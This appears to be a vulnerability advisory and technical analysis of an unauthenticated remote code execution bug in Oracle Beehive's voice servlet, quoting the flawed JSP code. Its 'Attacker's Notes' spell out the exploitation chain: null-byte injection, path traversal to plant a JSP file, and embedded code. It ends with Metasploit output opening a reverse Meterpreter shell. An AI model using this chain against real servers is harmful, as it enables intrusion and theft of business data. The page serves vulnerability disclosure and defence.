Attacker Value
Very High
(2 users assessed)
Very High
(2 users assessed)
User Interaction
Privileges Required
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Oracle Beehive prepareAudioToPlay() Function Vulnerability

Last updated February 13, 2020
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This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Beehive. Authentication is not required to exploit this vulnerability.

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Oracle Beehive suffers from a vulnerability that allows a remote attacker to upload a malicious
file, and execute it under the context of SYSTEM. Authentication is not required to exploit this

The prepareAudioToPlay() function found in voice-servlet is meant to be used to prepre for an
wav file upload, such as creating the base path, a session file, etc. The session file creation can
be abused via the playAudioFile.jsp page to upload anything we want without any security checks.

This bug was found while reviewing mr_me’s Oracle Beehive exploit privately submitted to me, which
also exploits the same type of problem in the same voice-servlet, but different function
(processEvaluation). I asked mr_me about the prepareAudioToPlay() one, and turns out he already
reported it to ZDI, so I took no additional steps for disclosure. I was still credited for the
overlapped finding anyway.

This bug is scheduled for public disclosure on Oct 28, 2015 (ZDI-CAN-3004).

Tested & Analyzed Versions

Oracle Beehive

Code Analysis

The vulnerable function (prepareAudioToPlay) can be found at the following location:

The Include.jspf file serves more like a library for the whole servlet. First off, it retrieves and
initializes the following parameters:

  // Global parameters
  String sessionNumber = request.getParameter("sess");
  String recxml        = request.getParameter("recxml");
  String wavFile       = request.getParameter("wavfile");
  String prevwavFile   = request.getParameter("prevwavfile");
  String audiopath     = request.getParameter("audiopath");
  String evaluation    = request.getParameter("evaluation");
  String testaudiopath = "testaudio";
  prevwavFile = prevwavFile != null && prevwavFile.equalsIgnoreCase("null") ? null :
  // Setup other local variables
  ServletContext context    = pageContext.getServletContext();
  String currDirectory      = context.getRealPath("") + File.separator + "prompt-qa";
  String resultsDirectory   = currDirectory + File.separator + "results";
  String sessionsDirectory  = currDirectory + File.separator + "sessions";
  String recxmlDirectory    = currDirectory + File.separator + "recxmls";
  String testDirectory      = currDirectory + File.separator + testaudiopath;

  // Styles
  .... skipping styles code because not important for our vulnerability ....

  // Initialize the session number and audio path
  sessionNumber   = generateSessionNumber(sessionNumber, sessionsDirectory);
  audiopath       = audiopath == null ? getAudioPath(recxml) : audiopath;

And then here’s our vulnerable function. For the arguments required, we have direct control of:

  • audiopath – this gives us control of the file path of a fastCopy function.
  • recxml – this gives us control of the sess file content.
  • wavFile – this gives us control of how the servlet builds the base path.
  • sessionNumber – this gives us control of the sess file name.

At the end of the function is the FileOutputStream code we can abuse to upload malicious data
to the web server.

  public void prepareAudioToPlay (String audiopath,
                                  String recxml,
                                  String wavFile,
                                  String sessionsDirectory,
                                  String sessionNumber,
                                  String currDirectory,
                                  String testDirectory,
                                  String testaudiopath) {
    // Build the base path for the new audio file.

    if (wavFile.indexOf(File.separator) != -1) {
      String base = wavFile.substring(0, wavFile.indexOf(File.separator));
      File   dir  = new File(testDirectory + File.separator +
                             recxml + File.separator + base);
    // Copy the file to test to the testaudio directory and give it a
    // unique name.
    int    index      = 0;
    String newWavFile = wavFile.substring(0,wavFile.length()-4) + "_" + index + ".wav";
    File   fout       = null;
    try {
      fout = new File(testDirectory + File.separator +
                      recxml + File.separator + newWavFile);
      // Generate a unique output file.
      while (fout.exists()) {
        newWavFile = wavFile.substring(0,wavFile.length()-4) + "_" + index + ".wav";
        fout = new File(testDirectory + File.separator +
                        recxml + File.separator + newWavFile);

    } catch (Exception e) {}

    File fin  = new File(currDirectory + File.separator +
                         audiopath + wavFile);
    fastCopy(fin, fout);

    // Put the file to play in the session file.
    File             sf  = null;
    FileOutputStream fos = null;
    PrintStream      ps  = null;
    try {
      sf  = new File(sessionsDirectory + File.separator + sessionNumber + ".sess");
      fos = new FileOutputStream(sf, false); // do not append
      ps  = new PrintStream(fos);
      ps.print(testaudiopath + "/" + recxml + "/" + newWavFile);
    } catch (Exception e2) {}

Since prepareAudioToPlay() is a function, and Include.jspf does not call itself, we need to
find another page that does. Our ideal candidate is playAudioFile.jsp, because it calls
prepareAudioToPlay() as soon as you request it:

<%@ include file="Include.jspf"%>

.... more code below but not so relevant to our bug ....

Attacker’s Notes

The two most important parameters are sess and recxml for the prepareAudioToPlay function.

Since the sess parameter is part of the filename:

sf  = new File(sessionsDirectory + File.separator + sessionNumber + ".sess");

We can inject a null byte at the end and supply our own file extension to create an arbitrary file
type (such as JSP). And then we can traverse our way out to a different directory, somewhere that
allows us to call the malicious file with an HTTP request.

The recxml parameter is part of the session file content:

ps.print(testaudiopath + "/" + recxml + "/" + newWavFile);

The testaudiopath variable, the slashes, and the newWavFile variable are junk to us, but should not
affect our malicious code as long as we wrap the code around in a <% ... %> block.

Another thing we need is the wavFile parameter has to be at least 4 bytes long, otherwise we trigger
this bug in the vulnerable function, and our attack fails:

String newWavFile = wavFile.substring(0,wavFile.length()-4) + "_" + index + ".wav";


Exploit is available as oracle_beehive_prepareaudiotoplay.rb:

msf exploit(beehive) > rerun
[*] Reloading module...
[*] Started reverse handler on
[*] - Stager name is: blah.jsp
[*] - Executable name is: blah.exe
[*] - Uploading stager...
[*] - Uploading payload...
[*] Sending stage (882688 bytes) to
[*] Meterpreter session 7 opened ( -> at 2015-05-07 02:01:54 -0500
meterpreter >
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is fairly trivial to exploit since there is an excellent Metasploit module for it. This software, when you find it, is likely to contain important business data, which can be valuable to an attacker.

General Information


Additional Info

Technical Analysis